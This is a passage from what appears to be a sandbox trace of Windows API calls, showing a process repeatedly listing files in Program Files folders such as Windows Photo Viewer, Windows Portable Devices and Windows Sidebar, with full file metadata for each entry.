ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0102.411] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0102.411] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Photo Viewer\\en-US\\*", lpFindFileData=0x2aef5c | out: lpFindFileData=0x2aef5c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22cc0dd2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0102.411] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22cc0dd2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0102.412] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11090870, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x11090870, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x0, dwReserved1=0x0, cFileName="ImagingDevices.exe.mui", cAlternateFileName="")) returned 1 [0102.412] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11090870, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x11090870, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x4c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="PhotoAcq.dll.mui", cAlternateFileName="")) returned 1 [0102.412] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11090870, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x11090870, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x4400, dwReserved0=0x0, dwReserved1=0x0, cFileName="PhotoViewer.dll.mui", cAlternateFileName="")) returned 1 [0102.412] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11090870, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x11090870, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x4400, dwReserved0=0x0, dwReserved1=0x0, cFileName="PhotoViewer.dll.mui", cAlternateFileName="")) returned 0 [0102.412] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0102.413] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0102.413] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0102.413] CoTaskMemFree (pv=0x506980) [0102.413] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Portable Devices\\*", lpFindFileData=0x2aefa4 | out: lpFindFileData=0x2aefa4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x987bf1ac, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x987bf1ac, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0102.413] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x987bf1ac, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x987bf1ac, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0102.414] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa93f44c2, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa93f44c2, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa93f44c2, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x3bc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="sqmapi.dll", cAlternateFileName="")) returned 1 [0102.414] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0102.414] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0102.414] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Portable Devices\\*", lpFindFileData=0x2aefa4 | out: lpFindFileData=0x2aefa4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x987bf1ac, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x987bf1ac, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0102.415] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x987bf1ac, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x987bf1ac, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0102.415] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa93f44c2, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa93f44c2, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa93f44c2, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x3bc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="sqmapi.dll", cAlternateFileName="")) returned 1 [0102.415] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa93f44c2, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa93f44c2, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa93f44c2, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x3bc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="sqmapi.dll", cAlternateFileName="")) returned 0 [0102.415] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0102.415] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0102.415] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0102.415] CoTaskMemFree (pv=0x506980) [0102.416] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\*", lpFindFileData=0x2aefa4 | out: lpFindFileData=0x2aefa4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xd002dac0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xd002dac0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0102.416] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xd002dac0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xd002dac0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0102.416] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eb25fda, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x237a3493, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eb25fda, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0102.418] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xffd0eb20, ftCreationTime.dwHighDateTime=0x1d5143d, ftLastAccessTime.dwLowDateTime=0x3f2fea50, ftLastAccessTime.dwHighDateTime=0x1d5557f, ftLastWriteTime.dwLowDateTime=0x3f2fea50, ftLastWriteTime.dwHighDateTime=0x1d5557f, nFileSizeHigh=0x0, nFileSizeLow=0x12800, dwReserved0=0x0, dwReserved1=0x0, cFileName="frankfurt-created.exe", cAlternateFileName="FRANKF~1.EXE")) returned 1 [0102.418] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xa1afe884, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa1afe884, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Gadgets", cAlternateFileName="")) returned 1 [0102.419] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1fd219f0, ftCreationTime.dwHighDateTime=0x1d53f89, ftLastAccessTime.dwLowDateTime=0xd1b2c30, ftLastAccessTime.dwHighDateTime=0x1d51f35, ftLastWriteTime.dwLowDateTime=0xd1b2c30, ftLastWriteTime.dwHighDateTime=0x1d51f35, nFileSizeHigh=0x0, nFileSizeLow=0x12800, dwReserved0=0x0, dwReserved1=0x0, cFileName="rossgo.exe", cAlternateFileName="")) returned 1 [0102.419] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d8b118c, ftCreationTime.dwHighDateTime=0x1ca0415, ftLastAccessTime.dwLowDateTime=0x7d8b118c, ftLastAccessTime.dwHighDateTime=0x1ca0415, ftLastWriteTime.dwLowDateTime=0x43f45420, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x15600, dwReserved0=0x0, dwReserved1=0x0, cFileName="sbdrop.dll", cAlternateFileName="")) returned 1 [0102.419] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80497579, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7bf43439, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7bf43439, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings.ini", cAlternateFileName="")) returned 1 [0102.419] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80046d91, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80046d91, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Shared Gadgets", cAlternateFileName="SHARED~1")) returned 1 [0102.419] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa896430f, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa896430f, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa898a46f, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x168400, dwReserved0=0x0, dwReserved1=0x0, cFileName="sidebar.exe", cAlternateFileName="")) returned 1 [0102.419] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7abe9733, ftCreationTime.dwHighDateTime=0x1ca0415, ftLastAccessTime.dwLowDateTime=0x7abe9733, ftLastAccessTime.dwHighDateTime=0x1ca0415, ftLastWriteTime.dwLowDateTime=0x45aefc70, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x27e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="wlsrvc.dll", cAlternateFileName="")) returned 1 [0102.420] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0102.420] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0102.420] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\*", lpFindFileData=0x2aefa4 | out: lpFindFileData=0x2aefa4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xd002dac0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xd002dac0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0102.421] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xd002dac0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xd002dac0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0102.421] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eb25fda, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x237a3493, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eb25fda, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0102.421] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xffd0eb20, ftCreationTime.dwHighDateTime=0x1d5143d, ftLastAccessTime.dwLowDateTime=0x3f2fea50, ftLastAccessTime.dwHighDateTime=0x1d5557f, ftLastWriteTime.dwLowDateTime=0x3f2fea50, ftLastWriteTime.dwHighDateTime=0x1d5557f, nFileSizeHigh=0x0, nFileSizeLow=0x12800, dwReserved0=0x0, dwReserved1=0x0, cFileName="frankfurt-created.exe", cAlternateFileName="FRANKF~1.EXE")) returned 1 [0102.421] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xa1afe884, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa1afe884, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Gadgets", cAlternateFileName="")) returned 1 [0102.422] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1fd219f0, ftCreationTime.dwHighDateTime=0x1d53f89, ftLastAccessTime.dwLowDateTime=0xd1b2c30, ftLastAccessTime.dwHighDateTime=0x1d51f35, ftLastWriteTime.dwLowDateTime=0xd1b2c30, ftLastWriteTime.dwHighDateTime=0x1d51f35, nFileSizeHigh=0x0, nFileSizeLow=0x12800, dwReserved0=0x0, dwReserved1=0x0, cFileName="rossgo.exe", cAlternateFileName="")) returned 1 [0102.422] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d8b118c, ftCreationTime.dwHighDateTime=0x1ca0415, ftLastAccessTime.dwLowDateTime=0x7d8b118c, ftLastAccessTime.dwHighDateTime=0x1ca0415, ftLastWriteTime.dwLowDateTime=0x43f45420, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x15600, dwReserved0=0x0, dwReserved1=0x0, cFileName="sbdrop.dll", cAlternateFileName="")) returned 1 [0102.422] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80497579, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7bf43439, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7bf43439, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings.ini", cAlternateFileName="")) returned 1 [0102.422] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80046d91, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80046d91, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Shared Gadgets", cAlternateFileName="SHARED~1")) returned 1 [0102.422] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa896430f, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa896430f, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa898a46f, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x168400, dwReserved0=0x0, dwReserved1=0x0, cFileName="sidebar.exe", cAlternateFileName="")) returned 1 [0102.422] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7abe9733, ftCreationTime.dwHighDateTime=0x1ca0415, ftLastAccessTime.dwLowDateTime=0x7abe9733, ftLastAccessTime.dwHighDateTime=0x1ca0415, ftLastWriteTime.dwLowDateTime=0x45aefc70, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x27e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="wlsrvc.dll", cAlternateFileName="")) returned 1 [0102.423] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7abe9733, ftCreationTime.dwHighDateTime=0x1ca0415, ftLastAccessTime.dwLowDateTime=0x7abe9733, ftLastAccessTime.dwHighDateTime=0x1ca0415, ftLastWriteTime.dwLowDateTime=0x45aefc70, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x27e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="wlsrvc.dll", cAlternateFileName="")) returned 0 [0102.423] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0102.423] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0102.423] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0102.423] CoTaskMemFree (pv=0x506980) [0102.423] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\en-US\\*", lpFindFileData=0x2aef5c | out: lpFindFileData=0x2aef5c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eb25fda, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x237a3493, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eb25fda, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0102.424] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eb25fda, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x237a3493, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eb25fda, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0102.424] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x119103a1, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x119103a1, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x800, dwReserved0=0x0, dwReserved1=0x0, cFileName="sbdrop.dll.mui", cAlternateFileName="")) returned 1 [0102.424] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x119103a1, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x119103a1, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x4a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Sidebar.exe.mui", cAlternateFileName="")) returned 1 [0102.424] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0102.425] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0102.425] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\en-US\\*", lpFindFileData=0x2aef5c | out: lpFindFileData=0x2aef5c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eb25fda, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x237a3493, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eb25fda, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0102.425] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eb25fda, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x237a3493, 